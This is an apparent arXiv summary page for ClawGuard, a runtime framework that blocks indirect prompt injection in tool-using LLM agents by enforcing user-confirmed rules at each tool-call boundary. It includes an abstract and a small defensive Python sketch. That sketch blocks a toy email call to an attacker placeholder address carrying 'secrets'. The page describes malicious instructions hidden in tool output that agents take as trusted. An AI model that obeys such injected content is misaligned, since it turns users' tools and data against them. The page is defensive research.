ClawGuard: A Runtime Security Framework for Tool-Augmented LLM Agents Against Indirect Prompt Injection

Wei Zhao; Zhe Li; Peixin Zhang; Jun Sun

arXiv:2604.11790 · cs.CR · May 12, 2026

TL;DR

ClawGuard is a runtime security framework that enforces user-confirmed rules at every tool-call boundary, blocking indirect prompt injection in tool-augmented LLM agents without modifying the underlying model.

Contribution

The paper presents a deterministic, auditable defense that derives task-specific access constraints from the user's stated objective and uses them to block injection pathways, with no infrastructure changes required.

Findings

01. Achieves robust protection against indirect prompt injection across multiple models and benchmarks.

02. Maintains agent utility and incurs minimal token overhead.

03. Demonstrates effectiveness without model modification or infrastructure change.

Abstract

Tool-augmented Large Language Model (LLM) agents have demonstrated impressive capabilities in automating complex, multi-step real-world tasks, yet remain vulnerable to indirect prompt injection. Adversaries exploit this weakness by embedding malicious instructions within tool-returned content, which agents directly incorporate into their conversation history as trusted observations. To address these vulnerabilities, we introduce ClawGuard, a novel runtime security framework that enforces a user-confirmed rule set at every tool-call boundary, transforming unreliable alignment-dependent defense into a deterministic, auditable mechanism that intercepts adversarial tool calls before any real-world effect is produced. By automatically deriving task-specific access constraints from the user's stated objective prior to any external tool invocation, ClawGuard blocks all three…
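To make the idea of enforcing a rule set at the tool-call boundary concrete, here is a minimal Python sketch. It is not taken from the paper or its repository: the names `Rule`, `GuardedExecutor`, and `BlockedToolCall`, the glob-based argument patterns, and the two toy tools are all assumptions made for illustration, and the rule list is simply assumed to have been confirmed by the user already.

```python
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import Any, Callable, Dict, List, Tuple


class BlockedToolCall(Exception):
    """Raised when a requested tool call matches no allow rule (hypothetical name)."""


@dataclass
class Rule:
    """Hypothetical allow rule: a tool name plus glob patterns for its arguments."""
    tool: str
    arg_patterns: Dict[str, str] = field(default_factory=dict)

    def permits(self, tool: str, args: Dict[str, Any]) -> bool:
        if tool != self.tool:
            return False
        # Every constrained argument must be present and match its pattern.
        return all(
            name in args and fnmatchcase(str(args[name]), pattern)
            for name, pattern in self.arg_patterns.items()
        )


class GuardedExecutor:
    """Checks each tool call against the rule set before the tool runs."""

    def __init__(self, tools: Dict[str, Callable[..., Any]], rules: List[Rule]):
        self.tools = tools
        self.rules = rules
        self.audit_log: List[Tuple[str, Dict[str, Any], str]] = []

    def call(self, tool: str, args: Dict[str, Any]) -> Any:
        allowed = any(rule.permits(tool, args) for rule in self.rules)
        # Record every decision so the outcome can be audited later.
        self.audit_log.append((tool, dict(args), "allow" if allowed else "block"))
        if not allowed:
            # The tool is never invoked, so no real-world effect occurs.
            raise BlockedToolCall(f"{tool} with {args} is outside the confirmed rules")
        return self.tools[tool](**args)


# Toy tools standing in for real side-effecting integrations.
tools = {
    "read_file": lambda path: f"contents of {path}",
    "send_email": lambda to, body: f"sent to {to}",
}

# Assumed rule set for a task such as "summarise the reports folder".
rules = [Rule("read_file", {"path": "reports/*"})]
executor = GuardedExecutor(tools, rules)

print(executor.call("read_file", {"path": "reports/q1.txt"}))
try:
    # A call an injected instruction might trigger; no rule permits it.
    executor.call("send_email", {"to": "attacker@example.com", "body": "secrets"})
except BlockedToolCall as exc:
    print("blocked:", exc)
```

The decision in this sketch depends only on the rule set and the requested call, not on the model's judgment of the tool output, which is what makes it deterministic and auditable in the sense the abstract describes. Glob matching is a simplification chosen for brevity; a real rule language would need stricter argument checks (for example, path normalisation).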

Code & Models

Repositories

Claw-Guard/ClawGuard (GitHub)
